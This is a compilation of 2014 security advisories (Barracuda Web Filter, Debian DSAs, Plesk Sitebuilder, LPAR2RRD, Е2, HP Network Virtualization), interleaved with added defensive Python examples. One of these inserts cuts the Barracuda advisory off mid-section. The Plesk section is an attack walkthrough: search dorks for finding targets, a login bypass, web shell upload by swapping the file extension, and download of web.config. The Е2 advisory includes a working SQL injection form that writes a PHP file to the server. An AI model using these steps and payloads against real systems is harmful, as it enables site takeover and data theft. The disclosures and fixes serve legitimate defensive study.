Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass Persistent Vulnerability
Document Title:
===============
Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1101

Barracuda Networks Security ID (BNSEC): BNSEC-2361
http://www.barracuda.com/kb?id=50160013m4O
Solution #6619 BNSEC-02361: Authenticated persistent IVE in Barracuda Web Filter v6.0.1

Release Date:
=============
2014-07-22

Vulnerability Laboratory ID (VL-ID):
====================================
1101

Common Vulnerability Scoring System:
====================================
3.7

Product & Service Introduction:
===============================
The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware from your organization. No more costly staff time lost repairing infected computers.

(Copy of the Vendor Homepage: https://www.barracuda.com/products/webfilter)

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities and a filter bypass issue in the Barracuda Networks WebFilter 610-Vx appliance web-application.

Vulnerability Disclosure Timeline:
==================================
2013-12-27: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-12-28: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2014-01-19: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-07-15: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]
2014-07-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Barracuda Networks
Product: WebFilter Appliance Web-Application 6.0.1.009 - X210 X310 X410 X510 X610 X710 X810 X910 X1010

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities and a filter bypass have been discovered in the Barracuda Networks WebFilter Model 610Vx appliance web-application. The vulnerabilities allow remote attackers to inject their own malicious script code on the application side of the affected service, module or function.

The vulnerabilities are located in the `domain names`, `grid__data in grid_columns` and `x-grid3-cell-inner x-grid3-col-name` values of the `Basic Reports` module. Remote attackers are able to inject their own script code as a domain name, which then executes in the context of the Show Advanced Options menu listing (+plus). The attack vector is persistent on the application side and the request method used to inject is POST.

To bypass the invalid-domain exception the attacker first submits a valid domain; in a second step he changes the domain name value with a session tamper (an intercepting proxy that rewrites the request before it is sent). The technique works because the input field validation is performed separately from the validation of the request that actually stores the value. The restriction enforced by the invalid-input check on the field can therefore be bypassed by using a session tamper to change the field content live, after the first direct input encoding performed by the web filter application.

Another problem is located in the same module and affects the button name item listing.

The security risk of the persistent input validation web vulnerabilities and the filter bypass is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.7.

Exploitation of the persistent web vulnerability requires low user interaction and a local low-privileged web-application account. Successful exploitation of the vulnerability results in session hijacking (customers), persistent phishing, persistent external redirects or persistent manipulation of connected or affected module context.

Request Method(s):
[+] GET
[+] POST

Vulnerable Module(s):
[+] Basic Reports > Advanced Options > Show Advanced Options

Vulnerable Input Field(s):
[+] Add Domain

Vulnerable Parameter(s):
[+] domain name
[+] grid__data in grid_columns
[+] x-grid3-cell-inner x-grid3-col-name

Affected Module(s):
[+] Reports Module Index
[+] Reports Module Advanced Options List
[+] Button Name Item List

Affected Version(s):
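The defect pattern described above (the field is checked on one request and stored by another, so a proxy can swap the value in between) is easy to reproduce outside the appliance. The following is an added example written for this page; it is not Barracuda code and the class and function names, the domain rule and the rendered markup are all assumptions. It models the flawed two-step flow, replays the session-tamper technique against it, and shows the two fixes a practitioner would apply: validate on the request that persists the value, and encode at the output boundary.

```python
import html
import re

# Hostname rule assumed for the 'Add Domain' field: dot-separated labels of
# letters, digits and hyphens, no leading/trailing hyphen, at most 253 chars.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))+$"
)


def is_valid_domain(value):
    return DOMAIN_RE.match(value) is not None


class VulnerableDomainList:
    """Models the flawed flow: the field check runs on the first request and
    the second request, the one that stores the value, trusts that result."""

    def __init__(self):
        self.domains = []

    def validate_step(self, domain):
        # Step 1: the 'invalid domain' exception is raised here and only here.
        return is_valid_domain(domain)

    def save_step(self, domain):
        # Step 2: commit. Nothing ties this value to the one checked in step 1.
        self.domains.append(domain)

    def render(self):
        # Output is built by concatenation, so stored text becomes markup.
        return "".join(f"<li>{d}</li>" for d in self.domains)


class HardenedDomainList(VulnerableDomainList):
    def save_step(self, domain):
        # Validate on the request that persists the value, whatever came before.
        if not is_valid_domain(domain):
            raise ValueError("invalid domain")
        self.domains.append(domain)

    def render(self):
        # Encode at the output boundary too, so a bad stored value stays inert.
        return "".join(f"<li>{html.escape(d, quote=True)}</li>" for d in self.domains)


def session_tamper(app, valid="example.com", payload="<script>alert(1)</script>"):
    """Replays the advisory's technique: pass the field check with a valid
    domain, then swap the value in the follow-up request. Returns True when the
    payload ends up unescaped in the rendered listing, i.e. the bypass worked."""
    if not app.validate_step(valid):
        raise AssertionError("the valid domain must pass the field check")
    try:
        app.save_step(payload)
    except ValueError:
        return False
    return payload in app.render()
```

Against `VulnerableDomainList` the tamper succeeds and the script tag lands in the listing; against `HardenedDomainList` the commit request rejects it, and even a value that somehow reached storage would be escaped on render.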
[SECURITY] [DSA 2984-1] acpi-support security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2984-1                   secur...@debian.org
http://www.debian.org/security/                            Luciano Bello
July 22, 2014                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : acpi-support
CVE ID         : CVE-2014-1419

CESG discovered a root escalation flaw in the acpi-support package. An unprivileged user can inject the DBUS_SESSION_BUS_ADDRESS environment variable to run arbitrary commands as root user via the policy-funcs script.

For the stable distribution (wheezy), this problem has been fixed in version 0.140-5+deb7u1.

For the testing distribution (jessie), this problem has been fixed in version 0.142-2.

For the unstable distribution (sid), this problem has been fixed in version 0.142-2.

We recommend that you upgrade your acpi-support packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCAAGBQJTzp77AAoJEG7C3vaP/jd0zssP/1WfL6Iq0elSTlAmqX8ZXQh2
0O8PFodYLSq/02clDQjGPAfxjwG2LWuXUlvt9/vn9G//sOKIW4SrGmoJRU89zwpk
uPPV51yLRaK4dv+A5binwFgCt+57vz3Of/8ung2JFEXBhWGh8fGqnRXpmCYM2BlI
70GHA2xLCNXxDd+aYClz7zXo0yPuTUhFWoL6HF+5IGoAJcn93t2N/UPPJ4Q7TM2f
cGOISy1WGicas8ytOpY9dRVBw314yEliYCMbJKJBcbnfawMAg2XLjbx3Kx9X7DEz
6wsW7TmgiyiDx44iqItdyc5hX3AqtbA1IIqdnBuKfzhxDBmtt7Ku4e/C5VoDIGqq
cs6Tsp11ztslsxoxi1B2nvJbGPAQt9CgiFRBdCzkawC/xD0IBCjEpVyqyCdr+TLe
sd1mGny3qk+j88xD7rgKK2e/p7ttce+CRsltH/TQHjGohsj/Z6tK9d6pzTNpJsUQ
9sau879yXv7X+s/x5v9QRpDuXgAi56yOpdWFU/UJuS8+Rg7OlakepWAheTrKcPl1
gboUO3xzuBgKYQDiNU7w/j3JKvFue+iIl9c+CHo8qriufR62hdwnpubM3qQurExG
rD0as7VIqqMPyOEaxn2Y8lZvCzkworCr2wPbLzSIWtfUM73zkcGMIpIwLw9OkkEV
8x4tW7dLSAktXPZAlzxZ
=leQs
-----END PGP SIGNATURE-----
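The flaw above is an instance of a general mistake: a script that runs as root inherits environment variables from the unprivileged user who triggered it, and one of those variables (here DBUS_SESSION_BUS_ADDRESS) influences what gets executed. The block below is an added example for this page, not Debian's or acpi-support's code, showing the two controls a privileged helper should apply: start from an explicit allowlist of variables rather than the caller's environment, and accept a session bus address only if it matches a deliberately narrow shape. The variable allowlist, the PATH value and the address pattern are assumptions chosen for illustration, not values from the advisory.

```python
import re
import subprocess

# Variables a root-running helper genuinely needs; everything else the caller
# supplies is dropped. PATH is replaced outright rather than inherited.
SAFE_ENV_KEYS = ("LANG", "LC_ALL", "TERM")
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

# Narrow allowlist for a session bus address: only the plain Unix-socket
# transports with an absolute path, optionally followed by the usual guid
# field. Any other transport, or any other shape, is refused outright.
_DBUS_UNIX = re.compile(
    r"^unix:(?:path|abstract)=(/[A-Za-z0-9._/-]+)(?:,guid=[0-9a-f]{32})?$"
)


def is_safe_dbus_address(addr):
    if not addr:
        return False
    m = _DBUS_UNIX.match(addr)
    return m is not None and ".." not in m.group(1)


def scrub_env(caller_env, keep_dbus=False):
    """Build the environment a privileged helper should be started with.

    caller_env is the untrusted environment of the unprivileged process. The
    session bus address is carried over only when explicitly requested and
    only if it passes is_safe_dbus_address(); otherwise it is dropped."""
    env = {k: caller_env[k] for k in SAFE_ENV_KEYS if k in caller_env}
    env["PATH"] = SAFE_PATH
    addr = caller_env.get("DBUS_SESSION_BUS_ADDRESS")
    if keep_dbus and is_safe_dbus_address(addr):
        env["DBUS_SESSION_BUS_ADDRESS"] = addr
    return env


def run_privileged_helper(argv, caller_env, keep_dbus=False):
    """Launch argv with the scrubbed environment and no shell, so nothing from
    the caller reaches a shell parser. Returns the CompletedProcess."""
    return subprocess.run(argv, env=scrub_env(caller_env, keep_dbus),
                          capture_output=True, text=True, check=False)
```

The point of `keep_dbus=False` as the default is that most privileged actions do not need a session bus at all; the address should be passed through only by the one code path that does, and then only after the check.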
[SECURITY] [DSA 2985-1] mysql-5.5 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2985-1                   secur...@debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
July 22, 2014                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mysql-5.5
CVE ID         : CVE-2014-2494 CVE-2014-4207 CVE-2014-4258 CVE-2014-4260
Debian Bug     : 754941

Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.38. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details:

http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-38.html
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

For the stable distribution (wheezy), these problems have been fixed in version 5.5.38-0+wheezy1.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your mysql-5.5 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJTzrRNAAoJEAVMuPMTQ89EixUP/2cqn0LO3KluXxfLubv+bryD
TwNguwPW2xc3UXNQb37gfJQn4kJh8dJm5tioh+VtvnN9a+kLiqCBroWL02Zx/Uz1
1pCdpOETMImdpTDprot3uyBEaOE17wit3NVA/zNREK+tA0LMnhog7bcbazVRBvZi
VAEJ7wM8uelnG/tS+tM7QQcLcWmEYVJOULTdOqDoIut3e8nM2E72+x4Sd1t1gq9w
lDy5s05OAEUuk5Cnrn11iApA/EyaT44hwai5dkc9wY3GFP5CdRuRrcSjHbPk68TI
GXOSsIThD0T5aqcaYfCDuZb+HcEXx2TX1Gq8Kfr4sAbWu4Yp6iKtLDXzuSVJnM20
BN31TndDONsuG60fM8itFp2qeIcZSjUCXTSSRVIZ9RKPya9ym3bft33bkXqY+ttx
sza1eXUIOAMLuXaQdVld2vyvqyDpjBOocG6tInSjzqE2lVAelo/O4SaiWTuo/eve
FzeBOAUmTgbJhM+MZ+TBcgDcFrwxb5FTFFx+fKO5AiBfopR5iM1wKffI/60JT6/U
fuuAzjjGmQVPi6bARsmGWOl5bdL7iIcIAHBmBAzDONgaJgjxamFW7uyN9U8q+iLP
OqlZXIkczIPMYVjxYKqHtepKCSoECPlnbTxMm0oLwCfPN5mzIQUyY2LhPZ+qOTsh
5qf0a0mQ3NwSSfOIh3JG
=Cpew
-----END PGP SIGNATURE-----
Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
#############################################################
# Title   : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
# Author  : alieye
# Vendor  : http://www.parallels.com/
# Contact : cseye...@yahoo.com
# Risk    : High
# Class   : Remote
#
# Google Dorks:
#   inurl::2006/Sites ext:aspx
#   inurl::2006 inurl:.ashx?mediaid
#   intext:© Copyright 2004-2007 SWsoft. ext:aspx
#   inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date : 23/07/2014
# OS   : Windows Server 2003
# PoC video clip : http://alieye.persiangig.com/video/plesk.rar/download
#############################################################

1) Login page bypass (all versions)

   http://victim.com:2006/login.aspx

   Change the URL path to:

   http://victim.com:2006/wizard

2) Uploading a shell via Live HTTP Headers (versions 2004-2007)

   Tools needed: Live HTTP Headers, backdoor shell

   Step 1: Locate the upload form in the logo upload section of
           http://victim.com:2006/Wizard/DesignLayout.aspx
   Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers.
   Step 3: Replay the captured request with Live HTTP Headers.
   Step 4: Change
           [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n]
           to
           [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]
   Step 5: Go to the shell path:
           http://victim.com:2006/Sites/<GUID of the created site>/App_Themes/green/images/shell_asp.asp

   The filename check only ever sees the value the browser sent; the replayed request carries a different one, and the server keeps the final extension.

3) Arbitrary file download (all versions)

   You can download any file from the target:

   http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=<GUID of the created site>&p=<filename>

   Example:

   http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config

4) XSS (all versions)

   You can inject XSS code into every module of this page:

   http://sitebuilder.cp.collaborationhost.net/Wizard/Edit.aspx

   Go to this page (Edit.aspx), click on one module (Blog, eShop, Forum, ...), then go to Add New Category and insert the XSS code into the Category description. Enjoy :)

5) No authentication for making a website (all versions)

   Malicious pages and phishing pages can be created through these paths:

   http://victim.com:2006/Wizard/Pages.aspx
   http://victim.com:2006/Wizard/Edit.aspx

#############################################################
# [#] Special members: ZOD14C, 4l130h1, bully13, 3.14nnph, amir
# [#] Thanks to all cseye members and all Iranian hackers
# [#] Website: http://cseye.vcp.ir/
#
# [#] Special thanks to the master of Persian music: Hossein Alizadeh
# [#] Hossein Alizadeh website: http://www.hosseinalizadeh.net/
# [#] Download the Ney-Nava album: http://dnl1.tebyan.net/1388/02/2009052010245138.rar
#############################################################
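Items 2 and 3 above share a root cause: the handler trusts a client-supplied name, once as the upload filename (so a replayed request with filename=shell.asp.asp is written next to the site's images) and once as the p= parameter of Site.ashx (so web.config can be read). The following is an added example for this page, not Plesk Sitebuilder code, showing how both handlers would decide for themselves. The image allowlist, the regular expressions and the images sub-directory (taken from the shell path quoted in step 5) are assumptions; the site GUID used in the test is the one from the advisory's example URL.

```python
import os
import re
import secrets
import uuid

# Accepted logo types, keyed by the only extension allowed for each, with the
# leading bytes the uploaded content must start with.
IMAGE_MAGIC = {
    "gif": b"GIF8",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
}
# Sub-path of a site directory the image handler may serve from (assumption
# derived from the path in the advisory).
IMAGES_SUBDIR = ("App_Themes", "green", "images")


def safe_upload_filename(client_filename, data):
    """Return a server-chosen name for an uploaded logo, or raise ValueError.

    The browser-side form can be bypassed by replaying the multipart request
    with another filename, so everything is decided here: exactly one
    extension, from an allowlist, content that matches it, and a random
    server-side name so the client never controls what is written to disk."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # 'shell.asp.gif' and 'shell.asp.asp' both have more than one extension
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        raise ValueError("filename must be name.ext with a single extension")
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    magic = IMAGE_MAGIC.get(ext)
    if magic is None:
        raise ValueError(f"extension {ext!r} is not an allowed image type")
    if not data.startswith(magic):
        raise ValueError("content does not match the declared image type")
    return f"{secrets.token_hex(8)}.{ext}"


def resolve_site_image(sites_root, site_id, requested):
    """Map the s=<site id>&p=<name> pair to a path inside that site's images
    directory, or raise ValueError. Rejects non-UUID site ids, any directory
    component in the name, dotfiles, and anything that is not an image."""
    try:
        site = str(uuid.UUID(site_id))
    except (ValueError, AttributeError, TypeError):
        raise ValueError("site id is not a UUID")
    name = os.path.basename(requested.replace("\\", "/"))
    if (name != requested or name.startswith(".")
            or not re.fullmatch(r"[A-Za-z0-9_.-]{1,128}", name)):
        raise ValueError("bad file name")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ("jpg" if ext == "jpeg" else ext) not in IMAGE_MAGIC:
        raise ValueError("only image files are served by this handler")
    images_dir = os.path.join(os.path.abspath(sites_root), site, *IMAGES_SUBDIR)
    path = os.path.normpath(os.path.join(images_dir, name))
    # Belt and braces: the final path must still lie inside the images directory.
    if os.path.commonpath([images_dir, path]) != images_dir:
        raise ValueError("path escapes the images directory")
    return path
```

Note that `safe_upload_filename` deliberately discards the client's base name: the stored name is random, so a multiple-extension trick cannot survive even if some other component later rewrites dots to underscores as the advisory observed.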
[oCERT-2014-005] LPAR2RRD input sanitization errors
#2014-005 LPAR2RRD input sanitization errors

Description:

LPAR2RRD is a performance monitoring and capacity planning software for IBM Power Systems. LPAR2RRD generates historical, future-trend and nearly real-time CPU utilization graphs of LPARs and of shared CPU usage.

Insufficient input sanitization on the parameters passed to the application web GUI leads to arbitrary command injection on the LPAR2RRD application server.

Affected version:
LPAR2RRD <= 4.53, <= 3.5

Fixed version:
LPAR2RRD 4.53

Credit: vulnerability report and PoC code received from Jürgen Bilberger juergen.bilberger AT daimler.com.

CVE: CVE-2014-4981 (version <= 3.5), CVE-2014-4982 (version <= 4.53)

Timeline:
2014-07-08: vulnerability report received
2014-07-08: contacted LPAR2RRD maintainers
2014-07-20: patch provided by maintainers, assigned CVEs
2014-07-22: contacted affected vendors
2014-07-23: advisory release

References:
http://www.lpar2rrd.com

Permalink:
http://www.ocert.org/advisories/ocert-2014-005.html

--
Daniele Bianco
Open Source Computer Security Incident Response Team
dan...@ocert.org
http://www.ocert.org

GPG Key 0x9544A497
GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D 4AC5 AE75 822E 9544 A497
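The advisory gives no parameter names, so the block below is an added example for this page, not LPAR2RRD code, illustrating the class of bug it describes: a web GUI parameter spliced into a command string that a shell will parse. The rrdtool invocation, the file layout and the parameter pattern are assumptions made for illustration. `shell_words` tokenises the vulnerable string the way a shell would, so the injected command shows up as separate words; `build_command_safe` validates each parameter and returns an argv list, and `run_argv` runs such a list with no shell at all.

```python
import re
import shlex
import subprocess

# Pattern assumed for names the GUI passes on (server, LPAR): one conservative
# rule for all of them; anything else is refused before a command is built.
SAFE_PARAM = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def build_command_vulnerable(server, lpar, days):
    """The injection pattern: request parameters are pasted into a command
    string that will later be handed to a shell (os.system, backticks,
    shell=True). Shown only to be tokenised, never executed here."""
    return f"rrdtool fetch /var/lib/lpar2rrd/{server}/{lpar}.rrd AVERAGE -s -{days}d"


def build_command_safe(server, lpar, days):
    """Validate every parameter, then return an argv list. With an argv list
    and no shell the arguments reach the program verbatim, so shell
    metacharacters inside them carry no meaning."""
    for value in (server, lpar):
        if not isinstance(value, str) or not SAFE_PARAM.match(value):
            raise ValueError(f"rejected parameter value: {value!r}")
    if not isinstance(days, int) or not 1 <= days <= 3650:
        raise ValueError("days must be an int between 1 and 3650")
    return ["rrdtool", "fetch", f"/var/lib/lpar2rrd/{server}/{lpar}.rrd",
            "AVERAGE", "-s", f"-{days}d"]


def shell_words(command_string):
    """Tokenise a command string the way a POSIX shell would, returning
    operators such as ';' as their own words so an injected command is visible."""
    lexer = shlex.shlex(command_string, posix=True, punctuation_chars=True)
    return list(lexer)


def run_argv(argv):
    """Run an argv list without a shell and return its stdout."""
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout
```

With `lpar = "x; id #"` the vulnerable string tokenises to `rrdtool fetch /var/lib/lpar2rrd/p770/x ; id`, the rest swallowed by the `#` comment; the same value is refused by `build_command_safe`, and passed through `run_argv` as a literal argument it is just text.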
SQL Injection in Е2
Advisory ID: HTB23222
Product: Е2
Vendor: Ilya Birman
Vulnerable Version(s): v2844 and probably prior
Tested Version: v2844
Advisory Publication: July 2, 2014 [without technical details]
Vendor Notification: July 2, 2014
Vendor Patch: July 3, 2014
Public Disclosure: July 23, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-4736
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in Е2, which can be exploited to perform SQL injection attacks and gain control over the vulnerable application.

1) SQL Injection in Е2: CVE-2014-4736

The vulnerability exists due to insufficient sanitization of input data passed via the "note-id" HTTP POST parameter to the "/@actions/comment-process" URI. A remote attacker can send a specially crafted HTTP POST request and inject and execute arbitrary SQL commands in the application's database.

Successful exploitation of the vulnerability may allow an attacker to add, modify or delete arbitrary records in the database and gain complete access to the web site.

The PoC code below will create a PHP file /var/www/file.php containing a phpinfo() call (if the filesystem permissions and MySQL configuration allow it; INTO OUTFILE needs the FILE privilege and a target directory permitted by secure_file_priv):

<form action="http://[host]/@actions/comment-process" method="post" name="main">
<input type="hidden" name="already-subscribed" value="">
<input type="hidden" name="comment-id" value="new">
<input type="hidden" name="elton-john" value="1">
<input type="hidden" name="email" value="m...@mail.com">
<input type="hidden" name="from" value="">
<input type="hidden" name="name" value="name">
<input type="hidden" name="subscribe" value="on">
<input type="hidden" name="text" value="1">
<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
<input type="submit" id="btn">
</form>

-----------------------------------------------------------------------------------------------

Solution:

Update to Е2 version v2845

More Information:
http://blogengine.ru/download/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23222 - https://www.htbridge.com/advisory/HTB23222 - SQL Injection in Е2.
[2] Е2 - http://blogengine.ru/ - E2 is a perfect engine for blogging.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
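The payload above works because the value of note-id is pasted into the statement text: the leading quote closes the string literal, UNION appends a SELECT with the same column count as the original query (fifteen in this case), and the trailing comment discards the quote the application adds. The block below is an added example for this page, not Е2 code, reproducing that mechanism on an in-memory SQLite database with a constructed schema, against a vulnerable lookup and a parameterised one. The table and column names and the three-column payload are assumptions; the INTO OUTFILE step is MySQL-specific and is not part of this example.

```python
import sqlite3

# Constructed schema standing in for the blog's tables; the real Е2 schema is
# not shown in the advisory.
SCHEMA = """
CREATE TABLE notes (id TEXT PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE users (login TEXT, password_hash TEXT);
INSERT INTO notes VALUES ('n1', 'First note', 'hello');
INSERT INTO users VALUES ('admin', '$2y$10$constructedhash');
"""


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def find_note_vulnerable(con, note_id):
    # The parameter is pasted into the statement text, so a quote in it ends
    # the string literal and whatever follows is parsed as SQL.
    sql = f"SELECT id, title, body FROM notes WHERE id = '{note_id}'"
    return con.execute(sql).fetchall()


def find_note_safe(con, note_id):
    # Placeholder: the driver passes the value separately from the statement,
    # so it can only ever be compared against id, never parsed as SQL.
    return con.execute(
        "SELECT id, title, body FROM notes WHERE id = ?", (note_id,)
    ).fetchall()


# Constructed payload in the same shape as the advisory's: close the literal,
# UNION a SELECT with as many columns as the original query (three here,
# fifteen in the advisory), then comment out the trailing quote.
PAYLOAD = "' UNION SELECT login, password_hash, 'x' FROM users -- "
```

Run against `find_note_vulnerable` the payload returns the users row in place of a note; against `find_note_safe` it returns nothing, because no note has that string as its id. The column-count requirement is why the advisory's payload carries fifteen values: a UNION with a different width is a syntax error, which is also how the number is usually discovered during testing.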
[security bulletin] HPSBMU03073 rev.1 - HP Network Virtualization, Remote Execution of Code, Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04374202

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04374202
Version: 1

HPSBMU03073 rev.1 - HP Network Virtualization, Remote Execution of Code, Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-07-22
Last Updated: 2014-07-22

Potential Security Impact: Remote execution of code, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Network Virtualization. The vulnerability could be exploited remotely to allow execution of code and disclosure of information.

References:
CVE-2014-2625 (ZDI-CAN-2023, SSRT101358)
CVE-2014-2626 (ZDI-CAN-2024, SSRT101359)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Virtualization v8.6

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2014-2625    (AV:N/AC:L/Au:N/C:C/I:P/A:N)       8.5
CVE-2014-2626    (AV:N/AC:L/Au:N/C:C/I:C/A:N)       9.4
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod working with HP's Zero Day Initiative for reporting CVE-2014-2625 and CVE-2014-2626 to security-al...@hp.com.

RESOLUTION

HP has provided the following patch to resolve the vulnerability:

Shunra Network Virtualization for HP Load Generator v8.61 Patch 1

The patch is available at HP Software Support Online (SSO) here:
http://support.openview.hp.com/selfsolve/document/LID/NV_1

HISTORY
Version:1 (rev.1) - 22 July 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlPO3j4ACgkQ4B86/C0qfVlIAQCfTEiRbCZSSu8QogE4O5kBRF2G
9fAAn19N7zwMr9smXEZx225xyN1283M5
=qVyP
-----END PGP SIGNATURE-----